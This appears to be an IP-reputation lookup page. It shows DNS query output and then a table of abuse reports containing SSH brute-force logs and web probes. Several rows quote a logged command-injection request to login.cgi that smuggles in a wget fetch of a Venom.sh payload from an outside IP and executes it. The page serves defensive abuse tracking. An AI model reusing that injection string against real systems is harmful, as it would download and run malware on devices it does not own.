City: unknown
Region: unknown
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 157.30.140.138
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28372
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;157.30.140.138. IN A
;; AUTHORITY SECTION:
. 480 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022011002 1800 900 604800 86400
;; Query time: 50 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jan 11 11:35:18 CST 2022
;; MSG SIZE rcvd: 107
b';; connection timed out; no servers could be reached
'
server can't find 157.30.140.138.in-addr.arpa: SERVFAIL
IP | Type | Details | Datetime |
---|---|---|---|
195.24.198.17 | attack | Too many connections or unauthorized access detected from Arctic banned ip |
2019-12-23 22:15:59 |
95.78.183.156 | attackbotsspam | Dec 23 15:29:58 tux-35-217 sshd\[1375\]: Invalid user saitoh from 95.78.183.156 port 57012 Dec 23 15:29:58 tux-35-217 sshd\[1375\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.78.183.156 Dec 23 15:30:00 tux-35-217 sshd\[1375\]: Failed password for invalid user saitoh from 95.78.183.156 port 57012 ssh2 Dec 23 15:36:20 tux-35-217 sshd\[1426\]: Invalid user elisary from 95.78.183.156 port 60235 Dec 23 15:36:20 tux-35-217 sshd\[1426\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.78.183.156 ... |
2019-12-23 22:41:36 |
34.67.151.107 | attackspam | C1,WP GET /suche/wordpress/wp-login.php |
2019-12-23 22:24:11 |
79.1.80.83 | attackbots | Dec 23 13:35:00 nextcloud sshd\[10226\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.1.80.83 user=root Dec 23 13:35:01 nextcloud sshd\[10226\]: Failed password for root from 79.1.80.83 port 59523 ssh2 Dec 23 13:40:56 nextcloud sshd\[20986\]: Invalid user partageolimpya from 79.1.80.83 Dec 23 13:40:56 nextcloud sshd\[20986\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.1.80.83 ... |
2019-12-23 22:15:31 |
213.251.41.52 | attackspambots | Dec 23 15:22:29 ns41 sshd[19203]: Failed password for root from 213.251.41.52 port 59852 ssh2 Dec 23 15:22:29 ns41 sshd[19203]: Failed password for root from 213.251.41.52 port 59852 ssh2 |
2019-12-23 22:40:04 |
34.225.49.7 | attack | Dec 23 10:12:06 server sshd\[9749\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-34-225-49-7.compute-1.amazonaws.com user=root Dec 23 10:12:08 server sshd\[9749\]: Failed password for root from 34.225.49.7 port 59357 ssh2 Dec 23 12:57:18 server sshd\[25452\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-34-225-49-7.compute-1.amazonaws.com user=root Dec 23 12:57:20 server sshd\[25452\]: Failed password for root from 34.225.49.7 port 46224 ssh2 Dec 23 17:09:15 server sshd\[27305\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ec2-34-225-49-7.compute-1.amazonaws.com user=root ... |
2019-12-23 22:28:47 |
41.44.65.56 | attack | 1 attack on wget probes like: 41.44.65.56 - - [22/Dec/2019:02:24:41 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 22:33:29 |
93.90.74.182 | attack | Dec 23 00:11:02 rtr-mst-350 sshd[24765]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=93.90.74.182 user=r.r Dec 23 00:11:05 rtr-mst-350 sshd[24765]: Failed password for r.r from 93.90.74.182 port 42846 ssh2 Dec 23 00:11:05 rtr-mst-350 sshd[24765]: Received disconnect from 93.90.74.182: 11: Bye Bye [preauth] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=93.90.74.182 |
2019-12-23 22:21:51 |
222.186.173.154 | attack | --- report --- Dec 23 10:55:14 sshd: Connection from 222.186.173.154 port 37854 |
2019-12-23 22:09:16 |
156.204.163.27 | attack | 1 attack on wget probes like: 156.204.163.27 - - [22/Dec/2019:20:18:29 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 22:21:29 |
175.183.49.166 | attackspambots | " " |
2019-12-23 22:41:19 |
197.55.235.202 | attackbotsspam | 1 attack on wget probes like: 197.55.235.202 - - [22/Dec/2019:19:16:28 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 22:26:49 |
156.220.26.251 | attackspam | 1 attack on wget probes like: 156.220.26.251 - - [22/Dec/2019:08:16:47 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 22:49:03 |
14.169.221.241 | attackbotsspam | failed_logins |
2019-12-23 22:30:17 |
139.59.58.102 | attackspambots | Dec 23 07:17:50 markkoudstaal sshd[4952]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.58.102 Dec 23 07:17:52 markkoudstaal sshd[4952]: Failed password for invalid user my954582@ from 139.59.58.102 port 39010 ssh2 Dec 23 07:23:54 markkoudstaal sshd[5462]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.58.102 |
2019-12-23 22:16:29 |